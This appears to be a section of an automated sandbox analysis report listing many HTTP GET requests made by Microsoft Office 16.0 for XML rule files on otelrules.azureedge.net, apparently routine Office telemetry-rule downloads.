Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
